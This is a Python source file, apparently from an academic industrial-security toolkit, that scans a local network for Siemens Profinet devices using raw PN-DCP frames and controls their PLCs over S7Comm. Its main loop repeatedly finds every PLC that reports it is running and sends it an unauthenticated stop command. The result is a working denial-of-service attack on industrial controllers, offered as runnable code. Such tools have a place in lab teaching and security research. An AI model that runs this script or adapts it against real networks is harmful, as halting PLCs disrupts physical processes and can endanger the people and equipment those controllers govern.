#! /usr/bin/env python3
r"""
    Copyright 2022 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <https://www.gnu.org/licenses/>.

        (Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/
            python profinet_scanner.py [-i interface]
        DLL Library import based on: https://code.google.com/p/winpcapy/
        Prerequisites: WinPcap (Windows) or libpcap (Linux) installed

        File name SiemensScan.py
        written by tijl[dot]deneut[at]howest[dot]be for IC4

        --- Profinet Scanner ---
        It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices,
        then list their info (detected only via DCP)
        Then give you the option to change network settings for any of them

        --- Siemens Hacker ---
        It also performs detailed scanning using S7Comm.
        Furthermore, this script reads inputs AND writes & reads outputs.
"""
import os
import re
import socket
import string
import struct
import sys
import time
from binascii import hexlify, unhexlify
from ctypes import (CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_uint, c_ubyte,
                    byref, create_string_buffer)
from ctypes.util import find_library
from multiprocessing.pool import ThreadPool
from pprint import pprint
from subprocess import Popen, PIPE


##### Classes
class Sockaddr(Structure):
    """ctypes layout used for the socket addresses referenced by PcapAddr."""
    _fields_ = [("sa_family", c_ushort),
                ("sa_data", c_char * 14)]


class PcapAddr(Structure):
    """Linked-list node holding the addresses of one Pcap interface."""
    pass


# Fields are assigned after the class statement because 'next' points to the class itself
PcapAddr._fields_ = [('next', POINTER(PcapAddr)),
                     ('addr', POINTER(Sockaddr)),
                     ('netmask', POINTER(Sockaddr)),
                     ('broadaddr', POINTER(Sockaddr)),
                     ('dstaddr', POINTER(Sockaddr))]


class PcapIf(Structure):
    """Linked-list node describing one interface, as filled in by pcap_findalldevs."""
    pass


# Fields are assigned after the class statement because 'next' points to the class itself
PcapIf._fields_ = [('next', POINTER(PcapIf)),
                   ('name', c_char_p),
                   ('description', c_char_p),
                   ('addresses', POINTER(PcapAddr)),
                   ('flags', c_int)]


class Timeval(Structure):
    """Capture timestamp (seconds + microseconds) embedded in PcapPkthdr."""
    pass


Timeval._fields_ = [('tv_sec', c_long),
                    ('tv_usec', c_long)]


class PcapPkthdr(Structure):
    """Per-packet header handed back by pcap_next_ex.

    'caplen' is the number of bytes actually captured, 'len' the length of the
    packet on the wire. Both are unsigned 32-bit values (bpf_u_int32) in libpcap,
    hence c_uint.
    """
    _fields_ = [('ts', Timeval),
                ('caplen', c_uint),
                ('len', c_uint)]


##### Initialize Pcap
if os.name == 'nt':
    try:
        # wpcap.dll is loaded by bare name, so the working directory is switched to the Npcap folder first
        os.chdir('C:/Windows/System32/Npcap')
        _lib = CDLL('wpcap.dll')
    except OSError:
        # Raised by os.chdir (folder missing) as well as by CDLL (library missing or not loadable)
        print('Error: WinPcap/Npcap not found!')
        print('Please download here: https://nmap.org/npcap/')
        input('Press [Enter] to close')
        sys.exit(1)
else:
    pcaplibrary = find_library('pcap')
    if pcaplibrary is None or str(pcaplibrary) == '':
        print('Error: Pcap library not found!')
        print('Please install with: e.g. apt install libpcap0.8')
        input('Press [Enter] to close')
        sys.exit(1)
    _lib = CDLL(pcaplibrary)

## match DLL function to list all devices
pcap_findalldevs = _lib.pcap_findalldevs
pcap_findalldevs.restype = c_int
pcap_findalldevs.argtypes = [POINTER(POINTER(PcapIf)), c_char_p]

## match DLL function to open a device: char *device, int snaplen, int prmisc, int to_ms, char *ebuf
## snaplen - maximum size of packets to capture in bytes
## promisc - set card in promiscuous mode?
## to_ms - time to wait for packets in milliseconds before read times out
## errbuf - if something happens, place error string here
pcap_open_live = _lib.pcap_open_live
pcap_open_live.restype = POINTER(c_void_p)
pcap_open_live.argtypes = [c_char_p, c_int, c_int, c_int, c_char_p]

## match DLL function to send a raw packet: pcap device handle, packetdata, packetlength
pcap_sendpacket = _lib.pcap_sendpacket
pcap_sendpacket.restype = c_int
pcap_sendpacket.argtypes = [POINTER(c_void_p), POINTER(c_ubyte), c_int]

## match DLL function to close a device
pcap_close = _lib.pcap_close
pcap_close.restype = None
pcap_close.argtypes = [POINTER(c_void_p)]

## match DLL function to get error message
pcap_geterr = _lib.pcap_geterr
pcap_geterr.restype = c_char_p
pcap_geterr.argtypes = [POINTER(c_void_p)]

## match DLL function to get next packet
pcap_next_ex = _lib.pcap_next_ex
pcap_next_ex.restype = c_int
pcap_next_ex.argtypes = [POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte))]

##### Variables
iDiscoverTimeout = 2


##### Functions
def get_all_interfaces():
    """List the local network interfaces that have a usable MAC address.

    Returns a twodimensional array of interfaces in this sequence for each interface:
      [0] = adaptername (e.g. Ethernet or eth0)
      [1] = Current IP (e.g. 192.168.0.2)
      [2] = Current MAC (e.g. ff:ee:dd:cc:bb:aa)
      [3] = Devicename (e.g. Intel 82575LM, Windows only)
      [4] = DeviceGUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55}, Windows only)

    The data is gathered by running 'getmac' / 'netsh' on Windows and 'ip address'
    on any other OS, and parsing their text output.
    """

    def add_to_arr(array, adapter, ip, mac, device, winguid):
        if len(mac) == 17:  # When no or bad MAC address (e.g. PPP adapter), do not add
            array.append([adapter, ip, mac, device, winguid])
        return array

    interfaces = []
    if os.name == 'nt':  # This should work on Windows
        # The context manager closes the pipe and reaps the child once the output is read
        with Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE) as proc:
            lst_getmac_lines = proc.stdout.readlines()
        for interface in lst_getmac_lines:
            # errors='ignore': an adapter name in a non-UTF-8 console codepage must not abort the listing
            intarr = interface.decode(errors='ignore').split(',')
            if len(intarr) < 4:
                continue  ## Blank or malformed line, nothing to parse
            adapter = intarr[0].replace('"', '')
            devicename = intarr[1].replace('"', '')
            mac = intarr[2].replace('"', '').lower().replace('-', ':')
            winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:]
            with Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True,
                       stdout=PIPE) as proc:
                lst_netsh_lines = proc.stdout.readlines()
            try:
                ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
                                lst_netsh_lines[0].decode(errors='ignore').replace(' ', ''))[0]
            except IndexError:
                # Either netsh printed nothing or its first line holds no IPv4 address
                ip = ''
            interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid)
    else:  # And this on any Linux
        # NOTE(review): 'grep -v "lo"' drops every header line containing "lo", which also
        # hides interfaces such as wlo1 - confirm whether that is intended.
        with Popen(
                "for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done",
                shell=True, stdout=PIPE) as proc:
            lst_ip_lines = proc.stdout.readlines()
        for interface in lst_ip_lines:
            intarr = interface.decode().split(' ')
            if len(intarr) < 3:
                continue  ## Fewer than name + IP + MAC: the device lacks an IPv4 address or a MAC, skip it
            interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '')

    return interfaces


## Expects sData like this 01020304050607 and returns bytearray
def create_packet(s_data):
    """Convert a hex string into a ctypes c_ubyte array that can be passed to pcap_sendpacket.

    Raises binascii.Error when s_data is not a valid even-length hex string.
    """
    b_hex_data = unhexlify(s_data)
    return (c_ubyte * len(b_hex_data))(*b_hex_data)


## Actually
## sends a packet
def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='',
                    s_dstmac=''):
    """Build one raw Ethernet frame and transmit it through Pcap.

    b_npfdevice: Pcap device name as bytes.
    s_ethertype: hex string selecting the frame to build:
        '88cc' -> fixed LLDP frame, '8100' -> PN-DCP discovery frame,
        '8892' -> frame built from s_network_data_to_set (wrapped in a fixed
        header/trailer when bool_set_network is True, used verbatim otherwise).
    s_srcmac / s_dstmac: MAC addresses as hex strings without separators;
        s_dstmac is overwritten for '88cc' and '8100'.

    Returns the transmitted frame as a ctypes c_ubyte array.
    Raises ValueError for any other s_ethertype. Exits the process (status 1)
    when the device cannot be opened or the frame cannot be sent.
    """
    if s_ethertype == '88cc':  # LLDP Packet
        s_dstmac = '0180c200000e'
        s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000'
    elif s_ethertype == '8100':  # PN-DCP, Profinet Discovery Packet, sEthertype '8100'
        s_dstmac = '010ecf000000'
        s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000'
    elif s_ethertype == '8892' and bool_set_network:
        ## Create packet to set networkdata, expect data in hexstring
        s_data = ('fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set
                  + '0000 0000 0000 0000 0000 0000').replace(' ', '')
    elif s_ethertype == '8892':
        ## Create custom packet with 'networkDataToSet' as the data (including length) and dstmac as dstmac
        s_data = s_network_data_to_set
    else:
        # Without this branch s_data would be unbound and fail later with an unrelated error
        raise ValueError('Unsupported ethertype: {!r}'.format(s_ethertype))

    ## Get packet as a bytearray
    arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data)

    ## Send the packet
    buf_errbuf = create_string_buffer(256)
    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nError: Please use sudo!\n')
        s_detail = buf_errbuf.value.decode(errors='ignore')
        if s_detail:
            print('Pcap reported: ' + s_detail)
        sys.exit(1)
    try:
        if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0:
            # Read the message before the handle is closed in the finally clause below
            b_error = pcap_geterr(handle_pcap_dev) or b''
            print('\nError sending the packet: %s\n' % b_error.decode(errors='ignore'))
            sys.exit(1)
    finally:
        pcap_close(handle_pcap_dev)
    return arr_byte_packet


## Receive packets, expect device to receive on, src mac address + ethertype to filter on and timeout in seconds
def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False):
    """Capture frames for up to i_timeout seconds and keep the matching ones.

    A frame matches when its ethertype (bytes 12-13) equals s_ethertype and its
    first six bytes (destination MAC) equal s_srcmac; both comparisons are
    case-insensitive on the hex representation.

    Returns a list of frames, each a list of byte values. With stop_on_receive
    the capture ends at the first match. Exits the process (status 1) when the
    device cannot be opened.
    """
    arr_received_raw_data = []
    buf_errbuf = create_string_buffer(256)
    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice))
        sys.exit(1)

    ptr_header = POINTER(PcapPkthdr)()
    ptr_pkt_data = POINTER(c_ubyte)()
    s_wanted_type = s_ethertype.lower()
    s_wanted_mac = s_srcmac.lower()
    fl_timer = time.time() + int(i_timeout)
    i_packets = 0
    try:
        ## Regular handler, loop until told otherwise (or with timer)
        while True:
            i_timeleft = int(round(fl_timer - time.time(), 0))
            status('Received packets: %s, time left: %i  \r' % (str(i_packets), i_timeleft))
            if i_timeleft <= 0:
                break  ## Regular timeout
            i_receivedpacket = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
            if i_receivedpacket < 0:
                break  ## Pcap reported an error or end of capture
            if i_receivedpacket == 0:
                # Read timeout elapsed without a packet: the header/data pointers are not
                # valid in this case, so they must not be dereferenced
                continue
            i_packets += 1
            # caplen is the number of bytes actually present in the capture buffer
            lst_rawdata = ptr_pkt_data[0:ptr_header.contents.caplen]
            s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower()
            s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower()
            if s_packettype == s_wanted_type and s_wanted_mac == s_targetmac:
                arr_received_raw_data.append(lst_rawdata)
                if stop_on_receive:
                    break
    finally:
        pcap_close(handle_pcap_dev)
    return arr_received_raw_data


def _decode_station_text(block):
    """Return the text payload of a DCP block (hex string), skipping header and BlockInfo."""
    # 4 header bytes + 2 BlockInfo bytes precede the text; NUL bytes are dropped
    return unhexlify(block[6 * 2:]).decode('ascii', errors='replace').replace('\x00', '')


def _hex_to_ipv4(s_hex):
    """Turn eight hex characters into dotted-quad notation."""
    return socket.inet_ntoa(struct.pack(">L", int(s_hex, 16)))


## Parsing the Raw PN_DCP data on discovery (source: https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py)
## Returns type_of_station, name_of_station, vendor_id, device_id, device_role, ip_address, subnet_mask, standard_gateway
def parse_response(s_hexdata, s_mac):
    """Parse a PN-DCP identify response into a dictionary.

    s_hexdata: hex string of the frame payload (everything after the Ethernet header).
    s_mac: MAC address stored unchanged under 'mac_address'.

    Fields that are not present in the response keep the string 'None'
    ('hardware' and 'firmware' keep the value None). Data that does not start
    with FrameID feff is reported on stdout and yields the defaults. Trailing
    padding and truncated blocks are ignored instead of raising.
    """
    arr_device = {
        'mac_address': s_mac,
        'type_of_station': 'None',
        'name_of_station': 'None',
        'vendor_id': 'None',
        'device_id': 'None',
        'device_role': 'None',
        'ip_address': 'None',
        'subnet_mask': 'None',
        'standard_gateway': 'None',
        'hardware': None,
        'firmware': None,
    }
    ## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF)
    if not str(s_hexdata[:4]).lower() == 'feff':
        print('Error: this data is not a proper DCP response?')
        return arr_device

    data_to_parse = s_hexdata[24:]  # (Static) offset to where first block starts
    ## Bytes 10 & 11 of the DCP header hold the length of all blocks; honouring it keeps
    ## Ethernet padding behind the last block out of the parser
    try:
        i_dcp_length = int(s_hexdata[20:24], 16)
    except ValueError:
        i_dcp_length = 0
    if i_dcp_length:
        data_to_parse = data_to_parse[:i_dcp_length * 2]

    while len(data_to_parse) >= 4 * 2:  # A block needs at least its 4-byte header
        ## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block
        block_length = int(data_to_parse[2 * 2:4 * 2], 16)
        block = data_to_parse[:(4 + block_length) * 2]

        ## Parse the block
        block_id = str(block[:2 * 2])
        if block_id == '0201':
            arr_device['type_of_station'] = _decode_station_text(block)
        elif block_id == '0202':
            arr_device['name_of_station'] = _decode_station_text(block)
        elif block_id == '0203' and len(block) >= 10 * 2:
            arr_device['vendor_id'] = str(block[6 * 2:8 * 2])
            arr_device['device_id'] = str(block[8 * 2:10 * 2])
        elif block_id == '0204' and len(block) >= 7 * 2:
            arr_device['device_role'] = str(block[6 * 2:7 * 2])
        elif block_id == '0102' and len(block) >= 18 * 2:
            arr_device['ip_address'] = _hex_to_ipv4(block[6 * 2:10 * 2])
            arr_device['subnet_mask'] = _hex_to_ipv4(block[10 * 2:14 * 2])
            arr_device['standard_gateway'] = _hex_to_ipv4(block[14 * 2:18 * 2])

        ## Maintain the loop
        padding = block_length % 2  # Will return 1 if odd
        data_to_parse = data_to_parse[(4 + block_length + padding) * 2:]

    return arr_device


def status(msg):
    """Write msg to stderr and flush immediately (used for the in-place progress line)."""
    sys.stderr.write(msg)
    sys.stderr.flush()


def send_and_recv(sock, strdata, sendOnly=False):
    """Send a hex string (spaces allowed) over sock and return the reply bytes.

    Returns None when sendOnly is True. Socket errors propagate to the caller.
    """
    data = unhexlify(strdata.replace(' ', '').lower())  ## Convert to real HEX (\x00\x00 ...)
    sock.sendall(data)  # sendall: a plain send() may transmit only part of the buffer
    if sendOnly:
        return None
    return sock.recv(65000)


def _tpkt_length(s_payload):
    """Return the total packet length as two hex digits: 7 header bytes (14 hex chars) plus the payload."""
    return format((len(s_payload.replace(' ', '')) + 14) // 2, '02x')


def get_cpu(device):
    """Query the CPU state of a device over TCP port 102.

    device: dictionary with an 'ip_address' entry.

    Returns 'Running' or 'Stopped' (byte 44 of the read response equal to 0x03
    means stopped), '' when the COTP connection request is not confirmed, and
    'Unknown' when the connection or any later exchange fails with a socket
    error. The socket is closed on every path.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)  # 1 second timeout
    try:
        sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102

        # Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC)
        ## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005)
        ## Response should be 03000016 11d00005001000c0010ac1020600c2020600
        cotpconnectresponse = hexlify(
            send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode(errors='ignore')
        if not cotpconnectresponse[10:12] == 'd0':
            print('COTP Connection Request failed')
            return ''

        ##---- S7 Setup Comm ------------
        ## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-)
        s7setupdata = '32010000020000080000' + 'f0000001000101e0'
        send_and_recv(sock, '030000' + _tpkt_length(s7setupdata) + '02f080' + s7setupdata)

        ##---- S7 Request CPU -----------
        s7readdata = '3207000005000008 000800011204 11440100ff09000404240001'
        s7read = send_and_recv(sock, '030000' + _tpkt_length(s7readdata) + '02f080' + s7readdata)
        if hexlify(s7read[44:45]).decode(errors='ignore') == '03':
            return 'Stopped'
        return 'Running'
    except OSError:
        # Covers refused/unreachable connections as well as timeouts (socket.timeout is an OSError)
        return 'Unknown'
    finally:
        sock.close()


def change_cpu(device):
    """Toggle the CPU state of a device: start it when get_cpu reports 'Stopped', stop it otherwise.

    device: dictionary with an 'ip_address' entry.

    Returns True when the whole exchange was sent, False when the connection or
    any exchange fails with a socket error. The socket is closed on every path.
    """
    cur_state = get_cpu(device)
    bool_start = cur_state == 'Stopped'
    s_tail = '000004e88969001200000000896a001300896b00040000000000000072020000'

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    try:
        sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102
        ## CR TPDU
        send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a')
        ## 'SubscriptionContainer'
        sResp = hexlify(send_and_recv(sock, '030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode(
            errors='ignore')
        ## Session id = byte 24 of the response + 0x80; the leading '0' keeps int() valid on a short response
        s_sid = format(int('0' + sResp[48:50], 16) + 0x80, 'x')
        if len(s_sid) % 2 == 1:
            s_sid = '0' + s_sid

        ## Only one byte differs between the start (ce) and stop (88) request
        s_opcode = 'ce' if bool_start else '88'
        send_and_recv(sock, '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ' + s_opcode + ' 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
        send_and_recv(sock, '0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000')
        send_and_recv(sock, '0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000')

        print('--- Getting data ---')
        ## Drain whatever the device still sends, until it stays quiet for one timeout period
        while True:
            try:
                if not sock.recv(65000):
                    break  # Empty read: the peer closed the connection, recv would never block again
            except socket.timeout:
                break

        send_and_recv(sock, '03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e' + s_tail)
        ## Again a single differing byte: 03 when starting, 01 when stopping
        s_mode = '03' if bool_start else '01'
        send_and_recv(sock, '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 ' + s_mode + ' ' + s_tail)
        send_and_recv(sock, '0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000')
        return True
    except OSError:
        return False
    finally:
        sock.close()


def scan_network(s_adapter, s_macaddr, s_winguid):
    """Send one PN-DCP discovery frame and collect the answers for iDiscoverTimeout seconds.

    s_adapter: adapter name, used as the Pcap device name on non-Windows systems.
    s_macaddr: own MAC address as hex string without separators.
    s_winguid: adapter GUID, used to build the Pcap device name on Windows.

    Returns (list of received frames, Pcap device name as bytes).
    """
    ## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0')
    if os.name == 'nt':
        s_adapter = r'\Device\NPF_' + s_winguid
    b_npfdevice = s_adapter.encode()

    ## Start building discovery packet
    print('Building packet')

    ## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LLDP)
    packet = send_raw_packet(b_npfdevice, '8100', s_macaddr)
    print('\nPacket has been sent (' + str(len(packet)) + ' bytes)')

    ## Receiving packets as bytearr (88cc == LLDP, 8892 == device PN_DCP)
    print('\nReceiving packets over ' + str(iDiscoverTimeout) + ' seconds ...\n')
    received_data_arr = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892')
    print()
    print('\nSaved ' + str(len(received_data_arr)) + ' packets')
    print()
    return received_data_arr, b_npfdevice


def parse_data(received_data_arr):
    """Turn captured frames into a list of device dictionaries (see parse_response).

    received_data_arr: iterable of frames, each an iterable of byte values.
    """
    lst_devices = []
    for packet in received_data_arr:
        s_frame_hex = hexlify(bytearray(packet)).decode(errors='ignore')
        s_hexdata = s_frame_hex[28:]  # take off ethernet header
        ## Some values found in the parsed fields:
        ## (vendor id 002a == siemens) (device id 0a01=switch, 0202=simulator, 0203=s7-300 CP, 0101=s7-300 ...)
        ## (0x01==IO-Device, 0x02==IO-Controller, 0x04==IO-Multidevice, 0x08==PN-Supervisor), (0000 0001, 0000 0010, 0000 0100, 0000 1000)
        ## Getting MAC address from packet (bytes 6-11, the sender), formatting with ':' in between
        s_mac_hex = s_frame_hex[6 * 2:12 * 2]
        s_mac = ':'.join(s_mac_hex[i:i + 2] for i in range(0, len(s_mac_hex), 2))
        lst_devices.append(parse_response(s_hexdata, s_mac))
    return lst_devices


def main():
    """Repeatedly scan via the first detected interface and call change_cpu on every device reported as 'Running'."""
    interfaces = get_all_interfaces()
    if not interfaces:
        print('Error: no network interface with a usable MAC address found')
        sys.exit(1)
    s_adapter = interfaces[0][0]  # eg: 'Ethernet 2'
    s_macaddr = interfaces[0][2].replace(':', '')  # eg: 'ab58e0ff585a'
    s_winguid = interfaces[0][4]  # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}'
    while True:
        received_data_arr, b_npfdevice = scan_network(s_adapter, s_macaddr, s_winguid)
        lst_devices = parse_data(received_data_arr)
        print(f"Found {len(lst_devices)} devices")
        for lst_device in lst_devices:
            pprint(lst_device)
        print("Stopping all CPUs")
        for device in lst_devices:
            current_state = get_cpu(device)
            if current_state == 'Running':
                change_cpu(device)
        time.sleep(5)


if __name__ == '__main__':
    main()